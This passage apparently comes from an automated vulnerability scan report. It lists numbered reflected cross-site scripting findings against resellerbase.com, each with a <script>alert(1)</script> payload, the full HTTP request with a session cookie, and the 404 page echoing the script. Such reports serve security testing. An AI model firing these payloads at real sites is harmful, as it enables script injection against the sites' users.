<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/broadband/themes/kosmos3c73d<script>alert(1)</script>424f0b105f3/images/review/ was not found on this server.</p>
...[SNIP]...

2.527. http://www.resellerbase.com/communication/broadband/themes/kosmos/images/review/ [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/broadband/themes/kosmos/images/review/

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload b3d13<script>alert(1)</script>7dec8c1c2b5 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/broadband/themes/kosmos/imagesb3d13<script>alert(1)</script>7dec8c1c2b5/review/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:36:59 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/broadband/themes/kosmos/imagesb3d13<script>alert(1)</script>7dec8c1c2b5/review/ was not found on this server.</p>
...[SNIP]...

2.528. http://www.resellerbase.com/communication/broadband/themes/kosmos/images/review/ [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/broadband/themes/kosmos/images/review/

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload f85ec<script>alert(1)</script>f99135e95aa was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/broadband/themes/kosmos/images/reviewf85ec<script>alert(1)</script>f99135e95aa/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:37:15 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/broadband/themes/kosmos/images/reviewf85ec<script>alert(1)</script>f99135e95aa/ was not found on this server.</p>
...[SNIP]...

2.529. http://www.resellerbase.com/communication/broadband/themes/kosmos/images/review/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/broadband/themes/kosmos/images/review/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload a389e<script>alert(1)</script>8dfabc65741 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/broadband/themes/kosmos/images/review/?a389e<script>alert(1)</script>8dfabc65741=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:36:02 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/broadband/themes/kosmos/images/review/?a389e<script>alert(1)</script>8dfabc65741=1 was not found on this server.</p>
...[SNIP]...

2.530. http://www.resellerbase.com/communication/broadband/themes/kosmos/images/review/0.gif [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/broadband/themes/kosmos/images/review/0.gif

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 822ab<script>alert(1)</script>6034ad9619d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication822ab<script>alert(1)</script>6034ad9619d/broadband/themes/kosmos/images/review/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:44:44 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication822ab<script>alert(1)</script>6034ad9619d/broadband/themes/kosmos/images/review/0.gif was not found on this server.</p>
...[SNIP]...

2.531. http://www.resellerbase.com/communication/broadband/themes/kosmos/images/review/0.gif [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/broadband/themes/kosmos/images/review/0.gif

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 24c3e<script>alert(1)</script>7a07d79cd48 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/broadband24c3e<script>alert(1)</script>7a07d79cd48/themes/kosmos/images/review/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:44:58 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/broadband24c3e<script>alert(1)</script>7a07d79cd48/themes/kosmos/images/review/0.gif was not found on this server.</p>
...[SNIP]...

2.532. http://www.resellerbase.com/communication/broadband/themes/kosmos/images/review/0.gif [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/broadband/themes/kosmos/images/review/0.gif

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload d9ea7<script>alert(1)</script>a92593a8a3b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/broadband/themesd9ea7<script>alert(1)</script>a92593a8a3b/kosmos/images/review/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:45:10 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/broadband/themesd9ea7<script>alert(1)</script>a92593a8a3b/kosmos/images/review/0.gif was not found on this server.</p>
...[SNIP]...

2.533. http://www.resellerbase.com/communication/broadband/themes/kosmos/images/review/0.gif [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/broadband/themes/kosmos/images/review/0.gif

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 7d71b<script>alert(1)</script>56643f9d9dd was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/broadband/themes/kosmos7d71b<script>alert(1)</script>56643f9d9dd/images/review/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:45:31 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/broadband/themes/kosmos7d71b<script>alert(1)</script>56643f9d9dd/images/review/0.gif was not found on this server.</p>
...[SNIP]...

2.534. http://www.resellerbase.com/communication/broadband/themes/kosmos/images/review/0.gif [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/broadband/themes/kosmos/images/review/0.gif

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload d9a7e<script>alert(1)</script>c7d2d428d98 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/broadband/themes/kosmos/imagesd9a7e<script>alert(1)</script>c7d2d428d98/review/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:45:41 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/broadband/themes/kosmos/imagesd9a7e<script>alert(1)</script>c7d2d428d98/review/0.gif was not found on this server.</p>
...[SNIP]...

2.535. http://www.resellerbase.com/communication/broadband/themes/kosmos/images/review/0.gif [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/broadband/themes/kosmos/images/review/0.gif

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 96336<script>alert(1)</script>28eb8aac899 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/broadband/themes/kosmos/images/review96336<script>alert(1)</script>28eb8aac899/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:45:52 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/broadband/themes/kosmos/images/review96336<script>alert(1)</script>28eb8aac899/0.gif was not found on this server.</p>
...[SNIP]...

2.536. http://www.resellerbase.com/communication/broadband/themes/kosmos/images/review/0.gif [REST URL parameter 7] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/broadband/themes/kosmos/images/review/0.gif

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload b2c8a<script>alert(1)</script>804057f0e7e was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/broadband/themes/kosmos/images/review/0.gifb2c8a<script>alert(1)</script>804057f0e7e HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:46:03 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/broadband/themes/kosmos/images/review/0.gifb2c8a<script>alert(1)</script>804057f0e7e was not found on this server.</p>
...[SNIP]...

2.537. http://www.resellerbase.com/communication/broadband/themes/kosmos/images/review/0.gif [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/broadband/themes/kosmos/images/review/0.gif

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 9b501<script>alert(1)</script>ba989198838 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/broadband/themes/kosmos/images/review/0.gif?9b501<script>alert(1)</script>ba989198838=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:44:24 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/broadband/themes/kosmos/images/review/0.gif?9b501<script>alert(1)</script>ba989198838=1 was not found on this server.</p>
...[SNIP]...

2.538. http://www.resellerbase.com/communication/broadband/themes/kosmos/images/review/search.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/broadband/themes/kosmos/images/review/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 7d634<script>alert(1)</script>ac1091bb527 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication7d634<script>alert(1)</script>ac1091bb527/broadband/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/broadband/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:37:36 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication7d634<script>alert(1)</script>ac1091bb527/broadband/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.539. http://www.resellerbase.com/communication/broadband/themes/kosmos/images/review/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/broadband/themes/kosmos/images/review/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 3e791<script>alert(1)</script>1cbf0215c78 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/broadband3e791<script>alert(1)</script>1cbf0215c78/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/broadband/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:37:49 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/broadband3e791<script>alert(1)</script>1cbf0215c78/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.540. http://www.resellerbase.com/communication/broadband/themes/kosmos/images/review/search.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/broadband/themes/kosmos/images/review/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload c86a8<script>alert(1)</script>e5aefa5e17 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/broadband/themesc86a8<script>alert(1)</script>e5aefa5e17/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/broadband/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:37:58 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/broadband/themesc86a8<script>alert(1)</script>e5aefa5e17/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.541. http://www.resellerbase.com/communication/broadband/themes/kosmos/images/review/search.php [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/broadband/themes/kosmos/images/review/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 9351e<script>alert(1)</script>739e56ab0ea was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/broadband/themes/kosmos9351e<script>alert(1)</script>739e56ab0ea/images/review/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/broadband/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:38:09 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/broadband/themes/kosmos9351e<script>alert(1)</script>739e56ab0ea/images/review/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.542. http://www.resellerbase.com/communication/broadband/themes/kosmos/images/review/search.php [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/broadband/themes/kosmos/images/review/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 65449<script>alert(1)</script>1aa6b59bfb6 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/broadband/themes/kosmos/images65449<script>alert(1)</script>1aa6b59bfb6/review/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/broadband/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:38:25 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/broadband/themes/kosmos/images65449<script>alert(1)</script>1aa6b59bfb6/review/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.543. http://www.resellerbase.com/communication/broadband/themes/kosmos/images/review/search.php [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/broadband/themes/kosmos/images/review/search.php

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 31c43<script>alert(1)</script>e88632a01a3 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/broadband/themes/kosmos/images/review31c43<script>alert(1)</script>e88632a01a3/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/broadband/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:38:34 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/broadband/themes/kosmos/images/review31c43<script>alert(1)</script>e88632a01a3/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.544. http://www.resellerbase.com/communication/broadband/themes/kosmos/images/review/search.php [REST URL parameter 7] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/broadband/themes/kosmos/images/review/search.php

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload 92c3b<script>alert(1)</script>e16088ae060 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/broadband/themes/kosmos/images/review/search.php92c3b<script>alert(1)</script>e16088ae060?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/broadband/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:38:50 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/broadband/themes/kosmos/images/review/search.php92c3b<script>alert(1)</script>e16088ae060?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.545. http://www.resellerbase.com/communication/broadband/themes/kosmos/images/review/search.php [Submit3 parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/communication/broadband/themes/kosmos/images/review/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 2ce9a<a>7d0f221622e was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

